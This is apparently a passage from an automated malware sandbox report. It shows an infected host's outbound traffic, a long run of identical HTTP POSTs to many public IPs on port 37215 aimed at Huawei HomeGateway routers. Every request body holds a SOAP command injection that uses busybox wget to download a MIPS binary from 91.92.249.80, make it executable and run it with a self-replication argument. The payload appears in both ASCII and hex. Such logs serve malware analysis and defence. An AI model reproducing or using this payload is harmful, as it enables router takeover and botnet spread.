                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          604192.168.2.2333690197.10.56.25137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213603973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          605192.168.2.2350514157.23.73.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213604927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          606192.168.2.2349868157.110.67.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213604927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          607192.168.2.236097041.222.44.6037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213624954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          608192.168.2.235193041.245.125.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213624954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          609192.168.2.2336744157.91.140.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213711023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          610192.168.2.2341956184.100.161.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213713884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          611192.168.2.235797841.198.2.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213726044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          612192.168.2.2344710197.4.21.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213736057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          613192.168.2.235429082.171.65.6037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213736057 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          614192.168.2.2334308157.103.215.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.213963985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
